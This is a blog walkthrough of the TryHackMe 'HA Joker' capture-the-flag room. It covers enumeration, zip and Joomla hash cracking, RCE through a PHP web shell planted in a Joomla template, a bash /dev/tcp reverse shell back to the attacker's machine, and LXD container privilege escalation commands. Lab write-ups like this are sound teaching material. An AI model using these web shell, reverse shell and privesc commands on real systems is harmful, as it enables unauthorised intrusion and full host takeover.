Open in app

Sign in

Write

Sign in

TryHackMe : HA Joker CTF

#$ubh@nk@r
6 min readJun 19, 2023

--

Intro:

This is a Medium Level CTF challenge. It starts with basic Enumeration and ends with ‘lxd’ Privilage Escalation. In this room you have to know about basic usage of tools. Here you will also learn RCE in Joomla Administrator Panel.

Nmap Scan:

As usual I always start with a basic nmap scan to scan the network.

Tip : nmap -sVC -T4 <ip> -vv

After the scan I got 3 ports are open — 22 , 80 , 8080.

Web Exploitation:

Now I start enumerate the web-server on Port 80 because the Port 8080 needs Authorization which is still unknown.

In the port 80 there is only joker’s image and found nothing. I also check the source code of that page but still failure.

So I started with a Regular ‘Gobuster’ Scan On port 80. I found a ineristing page called ‘phpinfo.php’ ; this is a type of Vulneribility which should be blocked from regular Users because it contains sensitive information. But here I found nothing to go further.

So I again start my Gobuster scan to search if there any webpage along with some extension (like : php , txt , js). And I found a found a directory called secret.txt.

Tip : gobuster dir -u <http://<ip>:<port>> -w <path_of_wordlist> -x txt,php

I visit the page and I found a conversation between joker and batman.

I thought joker or batman can be user for the webpage on Port 8080. But batman can’t hit me where joker hits me with his password. Yahhhh!!

The password is : h****h

Tip : Port 8080 [joker : h****h]

After giving the Credentials we got a page. This is Joomla CMS. Awesome!!!

I started my ‘nikto’ scan for searching any vulnerability because after all it is a CMS it may be exploitable.

Tip : nikto -h http://<ip>:<port>/ -id uname:pass

After sometime I got some Interesting things like : robots.txt , /administrator and also a backup.zip file. So let’s start. In the ‘administrator’ directory there is a Joomla Login Page but no Cred. This hits me most rather than Joker :)

Admin Panel

But there is a backup.zip file. I downloaded that in my machine but again need password to Unzip it. Ohhhhhh!!!

So I use ‘zip2john’ ; you can also use ‘fcrackzip’. I saved the hashes in a file and crack it using ‘JohnTheRipper’.

I already cracked the hash. You can see below.

Hash Crack

The zip file’s password is : h****h. I used the password to unzip the backup file and it gives me a ‘db’ directory along with a database file called ‘joomladb.sql’.

From the database I found a user name and a password_hash with may be the credentials of Joomla login page :)

Hashes

I saved the hash in a text file and cracked it using ‘John’.

Hash Crack

I have already cracked it.

Tip : [ admin : a******4 ] [ Joomla Admin Login ]

Admin Panel → www-data :

I used the credentials and it prompted me Joomla Admin Panel. Yesss!!!! Here I go for reverse_shell. I go to ‘Extensions’ tab then ‘Templates’ and ‘Templates’.

Here I found 2 Templates : Beez3 and Protostar.

Here I choose the Beez3 template and select ‘error.php’ page and replace the content with a php system command and saved it.

Tip : <? php system($_GET[‘cmd’]); ?>

Using this technique I get RCE on the Machine. For this you have to go to ‘/templates/beez3/error.php’ in Browser I will prefer you to use ‘BurpSuite’ then you have to specify the ‘cmd’ parameter after the URL.

Tip : /templates/beez3/error.php?cmd=id

Here I got the uid = www-data. Yupp!!!!!!

So next I change the ‘id’ command with a Reverse_shell command and URL encode it.

Tip : /bin/bash -c ‘bash -i >& /dev/tcp/<tun0_ip>/<port> 0>&1’

Then I set my netcat listener and I got a reverse shell as www-data.

LXD Privesc :

I type ‘id’ command and I found there is a group called ‘lxd’. So it is time for some LXD privesc.

So you have to download an alpine image builder from here in you machine and send the *.tar.gz file in the victim’s machine. In my case it is like this.

Tip : https://www.exploit-db.com/exploits/46978

Tip : git clone <URL> , cd lxd-alpine-builder , ./buld-alpine. [ command ]

You will get *.tar.gz file. I send the file using python3 server to the victim’s machine.

Please download it in /dev/shm directory in victim’s machine. Then type the following command. You will get a Alpine image.

Tip : *.tar.gz — alias myimage , lxc image list [ command ]

We came to the End Point Now. Just some command to enter that LXD container. Use the following command.

1 > lxc init myimage ignite -c security.privileged=true

2> lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

3> lxc start ignite

4> lxc exec ignite /bin/sh

It will give the Root of that LXD Container(#). How Amazing!

As we set the path to ‘/mnt/root’ so we have to go to there. Here You can find the total File System. From there you have to go to ‘root’. Here you can find ‘final.txt’.

And at last we hit the ‘JOKER’.

THANK YOU FOR READING!

Happy Hacking~

--

--

#$ubh@nk@r
#$ubh@nk@r

Written by #$ubh@nk@r

829 Followers
53 Following

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams